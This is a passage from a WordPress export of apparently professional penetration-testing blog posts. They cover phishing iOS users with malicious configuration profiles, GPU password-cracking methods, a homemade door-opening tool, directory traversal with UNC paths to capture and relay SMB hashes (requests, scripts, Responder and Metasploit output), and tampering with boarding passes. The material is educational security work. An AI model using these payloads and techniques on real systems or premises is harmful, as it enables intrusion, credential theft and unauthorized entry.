To start this off, we will be sending out a .mobileconfig file to iOS devices at the HACKME company. This .mobileconfig file is created with the iPhone Configuration Utility (shown below) and will set up iOS devices to use a specific proxy host when connected to a specific Wi-Fi network. This proxy will be used later to capture HTTP and HTTPS traffic. Additionally, we will configure trusted certificates and an MDM server to use for (malicious) device management. Our example will focus on getting users to install this .mobileconfig with a phishing email. The phishing email will come from support@hackme.com and will have the .mobileconfig file attached. The email will encourage the iPhone owners to install the .mobileconfig to maintain compliance with company policy. Once the target is phished and the profile is installed on their device, we will want their iOS device in range of our wireless access point. This could easily be done with a high powered Wi-Fi access point in the parking lot. If we want even closer access to our targets, we could send someone into the client building with a battery powered 3G/4G AP in a bag and have them run the attack from inside the building.

The Setup:

The first step in this attack is to set up our malicious .mobileconfig profile to send out with the phishing email. This .mobileconfig will have a default Wi-Fi network configured along with a proxy to use when connected to the Wi-Fi. For this demonstration, we will be showing screenshots from the Windows version of the iPhone Configuration Utility. Wi-Fi Network Setup (with proxy settings)

[Screenshot: Wi-Fi payload settings with the proxy configured]
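If you would rather script the profile than click through the iPhone Configuration Utility, here is a rough, hypothetical sketch of generating just the Wi-Fi/proxy payload with Python's plistlib. The payload key names are based on Apple's Configuration Profile documentation and should be verified against a profile exported by the utility before relying on them; all identifiers and passwords below are made up:

import plistlib, uuid

wifi_payload = {
    "PayloadType": "com.apple.wifi.managed",
    "PayloadVersion": 1,
    "PayloadIdentifier": "com.hackme.wifi",        # hypothetical identifier
    "PayloadUUID": str(uuid.uuid4()).upper(),
    "PayloadDisplayName": "HACKME Corporate Wi-Fi",
    "SSID_STR": "HACKME-CORP",                     # SSID the device will auto-join
    "AutoJoin": True,
    "EncryptionType": "WPA",
    "Password": "CorpWifiPassword",
    "ProxyType": "Manual",                         # force traffic through our proxy
    "ProxyServer": "192.168.1.123",
    "ProxyServerPort": 8080,
}

profile = {
    "PayloadType": "Configuration",
    "PayloadVersion": 1,
    "PayloadIdentifier": "com.hackme.profile",
    "PayloadUUID": str(uuid.uuid4()).upper(),
    "PayloadDisplayName": "HACKME IT Compliance Profile",
    "PayloadContent": [wifi_payload],              # CA cert and web clip payloads would be added here
}

with open("hackme.mobileconfig", "wb") as f:
    plistlib.dump(profile, f)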

If we are going to intercept HTTPS traffic, we are going to need a trusted root CA on the iOS device. This too can be done with the iPhone Configuration Utility. In this attack, we will be using the PortSwigger CA from the Burp proxy.

[Screenshot: adding the PortSwigger CA as a trusted certificate]

This config will then be exported to a .mobileconfig file, and we will send it along with the phishing email.

[Screenshot: exporting the profile to a .mobileconfig file]

The only downside to this is the signing of the profile. As of now, it can be a pain to get these properly signed using Windows. The Apple device management utility allows you to specify certs to use for signing, so I would say use the Apple tool for exporting your profiles. Overall this won't be too big of a deal, assuming that people will not care about the "Not Verified" warning on the profile.

[Screenshot: the "Not Verified" warning on the installed profile]

Once the user has the profile installed on their iOS device, we need to get in Wi-Fi range of their device. For simplicity's sake, let's say that we just tailgated into the office and set up shop in an empty office or conference room. A capture device, such as a Raspberry Pi or laptop, and a wireless AP (with 4G internet access) will be with us and running off of battery power. The capture device could also easily sit in a bag (purse, backpack, etc.) in an unlocked file cabinet. For our safety, we will lock the cabinet and take the key with us. We could then leave the devices for later retrieval, or have the capture device phone home for us to access the proxy logs remotely. At this point, there should be some decent data coming through on the Wi-Fi traffic, but our main goal for this demo is to capture the Exchange ActiveSync request. It looks like this:

[Screenshot: the captured Exchange ActiveSync request]

You'll see the Authorization token in the request header. This is actually the base64-encoded domain credentials (HACKME\hackmetest:P@ssword123!) for the iPhone user. Now that we have domain credentials, the rest of the escalation just got a lot easier. We also set up a web clip to deploy to the iOS device. This fake app will be handy in the event that we're unable to get the ActiveSync credentials. The app will look like a branded HACKME company application that opens a web page in Safari containing a login prompt. The malicious site will store any entered credentials and fail on attempts to log in. So even if we're not on the same Wi-Fi network, we might be able to get credentials.

[Screenshot: the fake web clip login page]
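Circling back to the captured ActiveSync request, pulling the credentials out of the Authorization header is just a base64 decode. Here is a minimal sketch (the header value below is a hypothetical example, not real capture data):

import base64

# Hypothetical Basic Authorization header captured from the ActiveSync request
auth_header = "Basic SEFDS01FXGhhY2ttZXRlc3Q6UEBzc3dvcmQxMjMh"

encoded = auth_header.split(" ", 1)[1]
domain_user, password = base64.b64decode(encoded).decode().split(":", 1)
print(domain_user, password)   # HACKME\hackmetest P@ssword123!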

One additional item to think about is that these profiles do not have to be deployed via email. If an attacker has access to an unlocked device and the passcode, they may be able to install the profile to the iOS device via USB. This attack can be particularly applicable to kiosk iOS devices that allow physical access to their lightning/30-pin connectors. Finally, all of this can be continually manipulated if you set up an MDM server for the device to connect to, but we'll save that for another blog.

Conclusion

Don't leave device management up to your users. If you are using iOS devices in your environment, lock the devices down and prevent users from installing their own configurations. More importantly, go and configure your company devices before an attacker does it for you. [post_title] => Malicious MobileConfigs [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => malicious-mobile-configs [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:48:52 [post_modified_gmt] => 2021-06-08 21:48:52 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1116 [menu_order] => 351 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [35] => WP_Post Object ( [ID] => 1117 [post_author] => 10 [post_date] => 2014-06-02 07:00:50 [post_date_gmt] => 2014-06-02 07:00:50 [post_content] => During many of our penetration tests, we gather domain password hashes (with permission of the client) for offline cracking and analysis. This blog is a quick summary of the hashes that we attempted to crack in the first quarter of 2014. The plan is to do this again each quarter for the rest of the year to see how we did overall for the year. There was a relatively small sample for this quarter: just three sets of domain hashes that added up to 10,050 hashes. We are frequently in environments with twice as many users (20k and up), so this is a pretty limited set. One of these sets had LM hashes stored along with the NTLM hashes, making our cracking efforts a little bit easier. Of these hashes, 2,583 were duplicates, leaving 7,184 unique hashes. Of the 10,050 hashes, we were able to crack 7,510 (74.73%).

[Pie chart: Q1 2014 hash cracking results]

Cracked Password Length Breakdown:

[Bar chart: Q1 2014 cracked password lengths]

As you can see, the cracked passwords peak at the eight character length. This is pretty common for a minimum password length, so it’s not a big surprise that this is the most common length cracked. Some more interesting finds:
  • Most Common Password (606 instances): Password1
  • Longest Password: 19 characters - visualmerchandising
  • Most Common Length (3,356 instances): 8 characters
  • Instances of “password” (case-insensitive): 122
  • Instances of [ClientName] (case-insensitive, no modifications, and redacted for obvious reasons): 284
  • Instances of “winter2014” (case-insensitive): 3
  • Instances of “winter14” (case-insensitive): 4
  • Instances of “spring2014” (case-insensitive): 5
  • Instances of “spring14” (case-insensitive): 8
In terms of effort that we put in on each of these hashes, we ran our typical twenty-four hour process on each of the hash files during each of the pentests. Since we keep a dictionary of all of the previously cracked hashes, this made it easier to re-run some of the cracking efforts with the already cracked hashes as a start. We added in some additional cracking time to really go after these hashes, but that was mostly brute force effort. I put together an hcmask file (to use with oclHashcat) of our top forty password patterns that were identified for this quarter. You can download it here - Q1Masks. I plan on keeping up with this each quarter, so check back in July to see how this mask file has changed by second quarter and how well we've done over the first half of the year. For more information on how we built our GPU-enhanced password cracking box, check out this presentation we recently did at Secure360: GPU Cracking - On The Cheap For a general outline of our password cracking methodology check out this post: GPU Password Cracking – Building a Better Methodology [post_title] => Cracking Stats for Q1 2014 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cracking-stats-for-q1-2014 [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:38 [post_modified_gmt] => 2021-04-13 00:05:38 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1117 [menu_order] => 352 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [36] => WP_Post Object ( [ID] => 1124 [post_author] => 10 [post_date] => 2014-03-15 07:00:38 [post_date_gmt] => 2014-03-15 07:00:38 [post_content] => In an attempt to speed up our password cracking process, we have run a number of tests to better match our guesses with the passwords that are being used by our clients. This is by no means a definitive cracking methodology, as it will probably change next month, but here's a look at what worked for us on a recent cracking test. For a little background, these hashes were pulled from a domain controller in the last six months. The DC still had some hashes stored in the older LanManager (LM) format in addition to NTLM. The password cracking process is also helped by using any cleartext passwords, recovered during the penetration test, as a dictionary. For this sample, there were:
  • 1000 total hashes (159 LM/NTLM, 841 NTLM-Only)
  • 828 unique hashes
  • 172 accounts with duplicate* passwords (*shared with one or more accounts)
Since LM hashes are weaker, we cracked those first. Initial attacks cracked all of the LM/NTLM hashes, giving us a nice head start (130/828 unique hashes or 15.7% cracked) and a good list to feed back into our other attacks.

The General Methodology:

1. Use the dictionary and rules (Three minutes*) - Remaining Unique Hashes 698

Our dictionary file will typically catch the simple passwords. Our dictionary includes previously cracked passwords and most dictionary-word-based passwords will be in here. Add in a couple of simple rules (d3ad0ne, passwordspro, etc.) and this will catch a few of the "smarter" users with passwords like "1qaz2wsx%". As for the starting rules, we're currently using a mix of the default oclHashcat rules and some of the rules from KoreLogic's 2010 rule list - http://contest-2010.korelogic.com/rules-hashcat.html For our sample set of data, the dictionary attack (with a couple of rules) caught 372 of the remaining 698 hashes (53%).
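To give a feel for what a rule-based attack is doing under the hood, here is a toy illustration in Python (this is not hashcat's rule engine, just the general idea): every dictionary word gets run through a set of simple transformations before being hashed and compared.

# A toy version of rule-based mangling: hashcat applies transformations
# like these (and many more) to every word in the dictionary.
rules = [
    lambda w: w,                      # :  (no-op)
    lambda w: w.capitalize(),         # c
    lambda w: w + "1",                # $1
    lambda w: w.capitalize() + "!",   # c $!
    lambda w: w.capitalize() + "123", # c $1 $2 $3
    lambda w: w[::-1],                # r (reverse)
]

wordlist = ["acme", "password", "netspi"]
candidates = {rule(word) for word in wordlist for rule in rules}
print(sorted(candidates))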

2. Start with the masking attacks (Fifteen minutes*) - Remaining Unique Hashes 326

Using mask attacks allows us to match common password patterns. Based on the passwords that we've cracked in the past, we identified the fifty most common password patterns (that our clients use). Here's a handy perl script for identifying those patterns - http://pastebin.com/Sybzwf3K. Due to the excessive time that some of these masks take, we've trimmed our list down to forty-three masks. The masks are based on the types of characters used in the password and follow this format: ?u?l?l?l?l?d?d?d. This is equivalent to (1 Uppercase Character) (4 Lowercase Characters) (3 Digits); a more practical example would be "Netsp199". For more information on masking attacks with oclHashcat, see http://hashcat.net/wiki/doku.php?id=mask_attack. Our top forty-three masks take about fifteen minutes to run through and caught 29 of the 326 (8%) remaining uncracked hashes from this sample.
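Here is a rough Python equivalent of that pattern-identification step (the linked perl script is the original; this is just a sketch): convert each cracked password into its hashcat mask and tally the most common ones.

from collections import Counter

def to_mask(password):
    # Map each character to the hashcat charset it belongs to.
    mask = ""
    for c in password:
        if c.islower():
            mask += "?l"
        elif c.isupper():
            mask += "?u"
        elif c.isdigit():
            mask += "?d"
        else:
            mask += "?s"
    return mask

cracked = ["Netsp199", "Password1", "Summer2014", "Acme123!"]  # example inputs
for mask, count in Counter(to_mask(p) for p in cracked).most_common(40):
    print(count, mask)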

3. Go back to the dictionary, this time with more ammunition (10 minutes*) - Remaining Unique Hashes 297

After we've cracked some of the passwords, we will want to funnel those results back into our mangling attacks. It's not hard for us to guess "!123Acme123!" after we've already cracked "Acme123". Just use the cracked passwords as your dictionary and repeat your rule-based attacks. This is also a good point to combine rules. oclHashcat allows you to combine rule sets to do a multi-vector mangle on your dictionary words. I've had pretty good luck with combining the best64 and the d3ad0neV3 rules, but your mileage may vary. Using this technique, we were able to crack four of the remaining 297 (1.3%) uncracked hashes.

4. Double your dictionary, double your fun? (20-35 minutes)

At this point, we're hitting our limits and need to start getting creative. Along with our hefty primary dictionary, we have a number of shorter dictionaries that are small enough that we can combine them to catch repeaters (e.g. "P@ssword P@ssword"). The attack is pretty simple: a word from the first dictionary will be appended with a word from the second. This style of attack is known as the combinator attack and is run with the -a 1 mode of oclHashcat. Additional rules can be applied to each dictionary to catch some common word delineation patterns ("Super-Secret!"). The example here would append a dash to the first word and an exclamation mark to the second. To be honest, this did not work for this sample set. Normally, we catch a few with this and it can be really handy in some scenarios, but that was not the case here. At this point, we will (typically) be about an hour into our cracking process. From the uniqued sample set, we were able to crack 530 of the 828 hashes (64%) within one hour. From the complete set (including duplicates), we were able to crack 701 of the 1,000 total hashes (70.1%).

5. When all else fails, brute force

Take a look at the company password policy. Seven characters is the minimum? That will take us about forty minutes to go through. Eight characters? A little over two and a half days. What does that mean for our cracking? It means we can easily go after any remaining seven character passwords (where applicable). For those with eight character minimums (or higher), it doesn't hurt for us to run a brute-force overnight on the hashes. Anything we get out of the brute-force can always be pulled back in to the wordlist for the rule-based attacks. Given that a fair amount of our cracking happens during a well-defined project timeframe, we've found that it's best for us to limit the cracking efforts to about twenty-four hours. This prevents us from wasting too much time on a single hash and it frees up our cracking rig for our other projects. If we really need to crack a hash, we'll extend this time limit out, but a day is usually enough to catch most of the hashes we're trying to crack. With the overall efforts that we put in here (~24 hours), we ended up cracking 757 of the 1,000 hashes (75.7%). As luck would have it, I wrote up all of the stats for this blog and immediately proceeded to crack two new sets of NTLM hashes. One was close to 800 hashes (90% cracked) and another had over 5000 hashes (84% cracked). So your results will vary based on the hashes you're trying to crack. *All times are based on our current setup (Four 7950 cards running OclHashcat 1.01) One final item to note. This is not the definitive password cracking methodology. This will probably change for us in the next year, month, week… People are always changing up how they create passwords and that will continue to influence the way we attack their hashes. I'll try to remember to come back to this next year and update with any changes. Did we miss any key cracking strategies? Let me know in the comments. [post_title] => GPU Password Cracking – Building a Better Methodology [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gpu-password-cracking-building-a-better-methodology [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:45 [post_modified_gmt] => 2021-04-13 00:05:45 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1124 [menu_order] => 358 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [37] => WP_Post Object ( [ID] => 1128 [post_author] => 10 [post_date] => 2014-02-19 07:00:07 [post_date_gmt] => 2014-02-19 07:00:07 [post_content] => NetSPI Senior Security Consultant Karl Fosaaen recently wrote a couple of guest blogs for the upcoming Secure360 2014 Conference blog, you can find them here: If you enjoy these, be sure to make it out to Secure360 this year as Karl will be presenting as well as co-instructing a full-day class on "An Introduction to Penetration Testing" along with NetSPI Principal Consultant Scott Sutherland. 
To learn more about Secure360, Karl's presentations, or information on how to sign up for the training please visit the pages below: [post_title] => Karl Fosaaen Guest Blogs for Secure360 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => karl-fosaaen-guest-blogs-for-secure360 [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:48 [post_modified_gmt] => 2021-04-13 00:05:48 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1128 [menu_order] => 362 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [38] => WP_Post Object ( [ID] => 1131 [post_author] => 10 [post_date] => 2014-01-27 07:00:46 [post_date_gmt] => 2014-01-27 07:00:46 [post_content] =>

This is a bit of a departure from our technical blogs, but today we're going to show you how to build your own door opening tool out of hardware store materials. For those who are not familiar with a "lever opener tool", it's a tool used by locksmiths (and others) to open doors from the outside. They're long hooks with a string attached. When the hook and string are looped over a door handle (think the L-shaped bar handles), tension is applied to the string and the hook pushes the door handle down.

Here's a professional one made by Keedex Inc.

[Image: Keedex lever opener tool]

It's my understanding that you have to be a locksmith or an officer of the law in order to purchase/own one of these (this may also depend on your state). But who knows, Amazon is selling them. So as with any of our "how to" blogs, be careful with what you're doing, as it may not be totally legal in your area. TOOOL is a great place to look for local lock pick laws.

Here's a basic MS Paint diagram of how the tool works.

[Diagram: how the lever opener tool works]

Hook the handle with the top of the tool and pull on the string. This should push the door handle down and you should be able to apply pressure to open the door. These are really simple to operate and can be really handy for entering locked doors. There are a couple of catches though. This will (potentially) not work if the door has a deadbolt. There are doors (see hotel rooms) that typically have linked deadbolts that will unlock when the handle is opened, but not every door is like that.

How to Make Your Own

We started with a couple of requirements on our end for making this:

  • Parts have to be readily available for purchase
  • The tool has to be non-damaging to the door
  • Tool should cost less than $50
    • The current cost of a Keedex K-22 on Amazon

Here's the parts list of everything that we bought.

Part Name                          Price
Zinc Threaded Rod ¼”               6 Feet - $3.97
Vinyl Coated Steel Rope            6 Feet - $1.86
Rod Coupling Nut (optional)        3 pack - $1.24
Key Rings (optional)               2 pack - $0.97
Heat Shrink Tubing ¼” (optional)   8 Feet - $4.97
Pre-Tax Total                      $13.01

Assembly is pretty simple. If you do not use the heat shrink tubing, the threads may grip into your hands (and the door), so gloves are advised. On that note, it's best to use the tubing, as it will protect the door you are trying to enter from the threads on the rod.

Build Steps:

  1. If you're using the shrink tubing, slide the tubing over the threaded rod. The stuff we used was a pretty close fit, so we only heated up the two ends to seal it to our opener.
  2. Make your first bend about 4-5 inches from one of the ends. This bend should be an 85-90 degree angle, and will serve as the lever for pushing down the handle.
  3. Make your second bend at the base, opposite of your first bend. This will be a curved bend, versus a right angle. This will allow for easier rocking of the opener to bring the lever up to the handle.
  4. Add an additional bend to the base to act as a handle. This will give additional leverage over the opener. You may want to trim this part, you might not. It's up to you.
  5. Add the vinyl coated rope to the lever. This can be attached with electrical tape. We added the coupling nut at the connection point to make it easier to tape the rope down.

At this point, your opener should be ready to use. Make sure that there are no sharp or hard points on the opener, to help protect the door you're trying to open. We also added a handle from a foam sword we had laying around. That is also optional.

Here's the build process beautifully detailed in MS Paint.

[Diagram: build steps for the opener]

Here's our finished opener in action.

How to prevent the issue

Preventing this issue is not really simple. However, one easy fix is to add draft guards to the bottom of the door to prevent the tool from being placed under the door. Additionally, handles should not be visible through glass doors. Being able to see the door handle makes it a lot easier to open. Door alarms and motion detectors should also be put in place to detect and alert on unauthorized entries.

[post_title] => Under the Door Tools – Opening Doors for Everyone [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => opening-doors-for-everyone [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:16 [post_modified_gmt] => 2021-06-08 21:51:16 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1131 [menu_order] => 365 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [39] => WP_Post Object ( [ID] => 1133 [post_author] => 10 [post_date] => 2014-01-13 07:00:41 [post_date_gmt] => 2014-01-13 07:00:41 [post_content] => For some reason I've recently run into a number of web applications that allow for either directory traversal or filename manipulation attacks. These issues are typically used to expose web server specific files and sensitive information files (web.config, salaryreport.pdf, etc.) and/or operating system files (SYSTEM, SAM, etc.) Here's what a typical vulnerable request looks like:
GET /Print/FileReader.aspx?Id=report1.pdf&Type=pdf HTTP/1.1
Host: example.com
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf;
Note the Id parameter in the URL. This is the vulnerable parameter that we will be attacking. We could easily change report1.pdf to any other file in the web directory (report2.pdf, web.config, etc.), but we can also turn our attack against the operating system. Here's an example request for the win.ini file from the web server:
GET /Print/FileReader.aspx?Id=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini&Type=pdf HTTP/1.1
Host: example.com
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf;
This is a more traditional directory traversal attack. We're moving up several directories so that we can go back into the Windows directory. Directory traversal attacks have been around for a long time, so this may be a pretty familiar concept. Now that we have the basic concepts out of the way, let's see how we can leverage it against internally deployed web applications. Internally deployed web applications can allow for a much wider attack area (RDP, SMB, etc.) against the web server. This also makes directory traversal and file specification attacks more interesting. Instead of just accessing arbitrary files on the system, why don't we try and access other systems in the environment. In order to pivot this attack to other systems on the network, we will be utilizing UNC file paths to capture and/or relay SMB credentials. As a point of clarification, the following examples are against web servers that are running on Windows. Following our previous examples, we will be using a UNC path to our attacking host, instead of report1.pdf for the parameter. Here's an example request:
GET /Print/FileReader.aspx?Id=\\192.168.1.123\test.pdf&Type=pdf HTTP/1.1
Host: example.com
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf;
This will force the web server to look for test.pdf at 192.168.1.123. This will allow us to capture and crack the network hashes for the account running the web server service. Here's an example of how we would use Responder.py to do the SMB capture:
python Responder.py -i 192.168.1.123
NBT Name Service/LLMNR Answerer 1.0.
Please send bugs/comments to: lgaffie@trustwave.com
To kill this script hit CRTL-C
[+]NBT-NS & LLMNR responder started
[+]Loading Responder.conf File..
Global Parameters set:
Responder is bound to this interface:eth0
Challenge set is: 1122334455667788
WPAD Proxy Server is:OFF
WPAD script loaded:function FindProxyForURL(url, host){return 'PROXY ISAProxySrv:3141; DIRECT';}
HTTP Server is:ON
HTTPS Server is:ON
SMB Server is:ON
SMB LM support is set to:OFF
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:OFF
Serving Executable via HTTP&WPAD is:OFF
Always Serving a Specific File via HTTP&WPAD is:OFF

[+]SMB-NTLMv2 hash captured from :  192.168.1.122
Domain is : EXAMPLE
User is : webserverservice
[+]SMB complete hash is : webserverservice::EXAMPLE:1122334455667788: 58D4DB26036DE56CB49237BFB9E418F8:01010000000000002A5FB1391FFCCE010F06DF8E6FE85EB20000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C000800300030000000000000000000000000300000620DD0B514EA55632219A4B83D1D6AAA07659ABA3A4BB54577C7AEEB871A88B90A001000000000000000000000000000000000000900260063006900660073002F00310030002E003100300030002E003100300030002E003100330036000000000000000000
Share requested: \\192.168.1.123\IPC$

[+]SMB-NTLMv2 hash captured from :  192.168.1.122
Domain is : EXAMPLE
User is : webserverservice
[+]SMB complete hash is : webserverservice::EXAMPLE:1122334455667788: 57A39519B09AA3F4B6EE7B385CFB624C:01010000000000001A98853A1FFCCE0166E7A590D6DF976B0000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C000800300030000000000000000000000000300000620DD0B514EA55632219A4B83D1D6AAA07659ABA3A4BB54577C7AEEB871A88B90A001000000000000000000000000000000000000900260063006900660073002F00310030002E003100300030002E003100300030002E003100330036000000000000000000
Share requested: \\192.168.1.123\test.pdf
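If you want to script the UNC injection instead of replaying the request by hand, a hypothetical sketch with Python requests might look like this (the host, parameter names, and session cookie are taken from the example request above):

import requests

# Inject a UNC path into the vulnerable Id parameter so the web server
# authenticates to our Responder host (192.168.1.123) over SMB.
url = "http://example.com/Print/FileReader.aspx"
params = {"Id": r"\\192.168.1.123\test.pdf", "Type": "pdf"}
cookies = {"ASP.NET_SessionId": "ofaj1zdqr40rl2tjtpt3y1lf"}

response = requests.get(url, params=params, cookies=cookies, verify=False)
print(response.status_code)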
Once we've captured the credentials, we can try to crack them with oclHashcat. If the server responds with LM hashes, you can use rainbow tables to speed things up. Once cracked, we can see where these credentials have access. Let's pretend that we are not able to crack the hash for the web server account. We can also try to relay these credentials to another host on the internal network (192.168.1.124) that the account may have access to. This can be done with the SMB Relay module within Metasploit and Responder recently added support for SMB relay. In the example below, we will use the Metasploit module to add a local user to the target server (192.168.1.124). The typical usage/payload for the module is to get a Meterpreter shell on the target system.
Module options (exploit/windows/smb/smb_relay):
Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SHARE       ADMIN$           yes       The share to connect to
SMBHOST     192.168.1.124    no        The target SMB server
SRVHOST     192.168.1.123    yes       The local host to listen on.
SRVPORT     445              yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLCert                      no        Path to a custom SSL certificate
SSLVersion  SSL3             no        Specify the version of SSL that should be used 

Payload options (windows/adduser):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
CUSTOM                     no        Custom group name to be used instead of default
EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
PASS      Password123!     yes       The password for this user
USER      netspi           yes       The username to create
WMIC      false            yes       Use WMIC on the target to resolve administrators group

Exploit running as background job.

Server started.
<------------Truncated------------>
Received 192.168.1.122:21251 EXAMPLE\webserverservice
LMHASH:b2--Truncated--03 NTHASH:46-- Truncated --00 OS: LM:
Authenticating to 192.168.1.124 as EXAMPLE\webserverservice...
AUTHENTICATED as EXAMPLE\webserverservice...
Connecting to the defined share...
Regenerating the payload...
Uploading payload...
Created OemWSPRa.exe...
Connecting to the Service Control Manager...
Obtaining a service manager handle...
Creating a new service...
Closing service handle...
Opening service...
Starting the service...
Removing the service...
Closing service handle...
Deleting OemWSPRa.exe...
Sending Access Denied to 192.168.1.122:21251 EXAMPLE\webserverservice
This may not be mind-blowing new information, but hopefully this gives you some good ideas on other ways to utilize directory traversal vulnerabilities. [post_title] => SMB Attacks Through Directory Traversal [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => smb-attacks-through-directory-traversal [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:54 [post_modified_gmt] => 2021-04-13 00:05:54 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1133 [menu_order] => 366 [post_type] => post [post_mime_type] => [comment_count] => 4 [filter] => raw ) [40] => WP_Post Object ( [ID] => 1138 [post_author] => 10 [post_date] => 2013-11-15 07:00:34 [post_date_gmt] => 2013-11-15 07:00:34 [post_content] => I've covered hacking Passbook files in the past, but I've decided that it's now a good time to cover modifying boarding passes. To start things off, you should not replicate what I'm showing in this blog. Modifying your boarding passes could easily get you in trouble with the TSA, and no one has time for that. iOS 7 has made it a lot easier to export Passbook files, so I think it's time to point out some issues surrounding boarding passes in Passbook. First off, let's send ourselves a copy of a boarding pass. It's as simple as opening Passbook, opening the pass, and hitting the square in the bottom left corner of the pass. Boarding Once you've emailed the .pkpass file to yourself, right click on the file and extract (or unzip) the files. The .pkpass file is just a zip file with a different name. Bp This will result in the following files in the directory. Bp There will be two more files in there if you have Sky Priority. If you don't already have Sky Priority, the image files can be found here. These footer images are also used for the TSA Pre Check boarding passes. They just have the Pre Check logo appended to the right of the Sky Priority logo. So we have the boarding pass file. That's cool. What can we do with it? Well, if you have an Apple Developer's account ($99 - more info here), you can modify the boarding pass and email it back to yourself. There is a signature file required by iOS to trust the Passbook pass, that can only be generated with a proper Apple Developer's certificate, but that's something you get as an Apple developer. I have heard that this signature file is not required for loading Passbook files into the "Passbook for Android" application, but I have not seen it in practice. So if you're using the passes from an Android phone, there's a chance that you won't have to re-sign the pass. For this demonstration, we'll show how you can give yourself Sky Priority on a flight. All that you need to do is add the two Sky Priority images (linked above) to your directory and modify the pass.json file to say that you are in the SKY boarding zone. This can easily be done with a text editor. Here's what my pass.json file looks like after changing the boarding zone. Bp Note that I changed the "zone" parameter. If you felt so inclined, you could change your seat number. If you wanted to social engineer your way into first class, this would be a good way to start. Again, I don't recommend doing any of this. This would not change your boarding pass barcode (also modifiable in pass.json), which is "tamper evident" and is supposed to be signed by a Delta private key. 
I have not tested this, but if the airport barcode scanners are not checking the signature, you would be able to modify the barcode as well. Again, I have not tested this or seen it in practice, but I have seen documentation that states the security data (signature) is optional. There's more info on the barcode standard here. If you are going to re-sign the pass, you will also need to modify the passTypeIdentifier and teamIdentifier fields (in the pass.json) to match your Apple Developer's account. If these do not match your Apple info, the pass will not validate when you go to sign and/or use it. There's some more info on signing your first pass here. You'll also want to delete your manifest.json and signature files, as those were generated by the original pass signer. Your final directory will look like this: Bp At this point you will want to run the SignPass utility on the directory. Your output will look like this. Bp And you will end up with a .pkpass file that you can email to your iOS device. Boarding Now, let's say you wanted to make it easier to upgrade your priority for all of your flights. It would not be hard to make a script to listen on an email inbox for a .pkpass file, unzip it, modify it, re-sign it, and email the pass back to the sender. On that note, don't send me your boarding passes. I don't have this script set up and I don't want your boarding passes. This issue is not limited to Delta. Any app that uses Passbook, is vulnerable to pass tampering attacks. This has been a problem for a while. Now that Passbook allows easy exports of .pkpass files, messing with the files is a lot easier. [post_title] => Sky Prioritize Yourself [post_excerpt] => I've covered hacking Passbook files in the past, but I've decided that it's now a good time to cover modifying boarding passes. To start things... [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] 